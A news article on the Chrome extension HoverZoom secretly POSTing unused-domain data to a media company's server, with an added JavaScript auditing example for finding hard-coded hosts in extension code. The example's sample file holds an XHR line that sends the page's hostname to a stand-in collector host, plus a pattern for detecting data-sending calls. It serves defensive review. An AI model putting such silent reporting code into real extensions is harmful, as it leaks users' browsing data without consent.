Beware: HoverZoom extension for Chrome turns evil
It should not happen that extensions get modified in key aspects without existing users being made aware of those changes.
We have already seen how companies take advantage of Mozilla's add-on repository by approaching add-on developers to purchase their extensions, or to have them modify the extensions to gather data or implement money-making schemes.
Today it became known that the author of the popular HoverZoom extension for the Google Chrome browser also implemented "features" into the extension that many users will certainly consider unethical if only they knew about them.
A user of the extension noticed that it was acting up when connections to GitHub were made. After additional users reported the same issue, one user wanted to know why HoverZoom needed to POST to a Czech media company server (http://advisormedia.cz/).
The author's reply confirmed that he had agreed to enter a partnership with the company. According to his post, the script detects unused domain names and posts that information to the media company's site.
"This script was added after a partnership has been established with a media consulting company. It detects unused domain names and posts the results to their site. The collected data is strictly anonymous."
HoverZoom is a popular extension for the Chrome browser. The Chrome Web Store lists more than 761,000 users, and reviews of it have been outright positive until now. The most recent reviews, on the other hand, highlight the issue and rate the extension with one star.
What needs to be mentioned in this regard is that the new version, the one with the domain checking, was accepted into the Web Store, which should be a concern for all users of the store. Is it the only extension for Chrome that does that, or did the Czech company contact other extension developers as well to get them to add a similar script to their extensions?
A free fork of the extension has been created by a Reddit user. Hover Free is basically the same extension, but without the domain checking part or other features the original author may have implemented into it lately.
Update: Hover Free is no longer available. It is not clear why that is the case.
We can learn a couple of things from this though. First, companies not only exploit the Mozilla Store but also the Chrome Web Store by making monetary offers to extension developers, and second, the scripts that get integrated into these extensions do not seem to be detected by reviews. This is not very reassuring though as there is not really anything that regular users can do to detect this in their extensions.
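A reviewer who unpacks an extension can at least list the hosts hard-coded in its scripts and compare them with what the extension needs for its stated purpose. The following is an added example, not code from HoverZoom or from the original article; the file names, the sample sources, the host collector.example.net and the allowlist are constructed for illustration.

```javascript
// Added example: list the hosts hard-coded in an extension's scripts and flag
// those outside the set the extension needs for its stated purpose.
// All file names, sources and the allowlist below are constructed samples.

const URL_LITERAL = /https?:\/\/[^\s"'`<>)\\]+/g;
// Calls that can send data off the page (XHR, fetch, beacon, jQuery helpers).
const SEND_SINK = /XMLHttpRequest|\.open\s*\(|fetch\s*\(|sendBeacon\s*\(|\$\.(post|ajax)\s*\(/;

function hostOf(urlText) {
  try { return new URL(urlText).hostname.toLowerCase(); } catch (e) { return null; }
}

// True when host equals an allowed name or is a subdomain of it.
function isExpected(host, expectedHosts) {
  return expectedHosts.some(h => host === h || host.endsWith("." + h));
}

// files: { "path/name.js": "source text" }; returns one finding per unexpected URL.
function auditExtensionSources(files, expectedHosts) {
  const findings = [];
  for (const [file, source] of Object.entries(files)) {
    const lines = source.split(/\r?\n/);
    lines.forEach((text, i) => {
      for (const url of text.match(URL_LITERAL) || []) {
        const host = hostOf(url);
        if (!host || isExpected(host, expectedHosts)) continue;
        // Look at the line and its neighbours for a network-send call.
        const context = lines.slice(Math.max(0, i - 2), i + 3).join("\n");
        findings.push({ file, line: i + 1, host, sendsData: SEND_SINK.test(context) });
      }
    });
  }
  return findings;
}

// Constructed sample: an image-zoom extension with one unrelated reporting script.
const sampleFiles = {
  "plugins/imgur.js": 'var full = "https://i.imgur.com/" + id + ".jpg";',
  "js/report.js": [
    "var xhr = new XMLHttpRequest();",
    'xhr.open("POST", "http://collector.example.net/submit", true);',
    "xhr.send(JSON.stringify({ domain: location.hostname }));",
  ].join("\n"),
};
const sampleFindings = auditExtensionSources(sampleFiles, ["imgur.com"]);
console.log(sampleFindings);
```

A static scan like this only sees URLs written out as literals; a host assembled at run time or fetched from a remote configuration will not appear, so it complements watching the extension's network traffic rather than replacing it.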
Update: The author of the original HoverZoom extension has implemented a switch in the settings which blocks anonymous usage statistics from being sent. There is no direct alternative for Chrome, but you can use the userscript Mouseover Popup Image Viewer instead, which offers a similar feature set.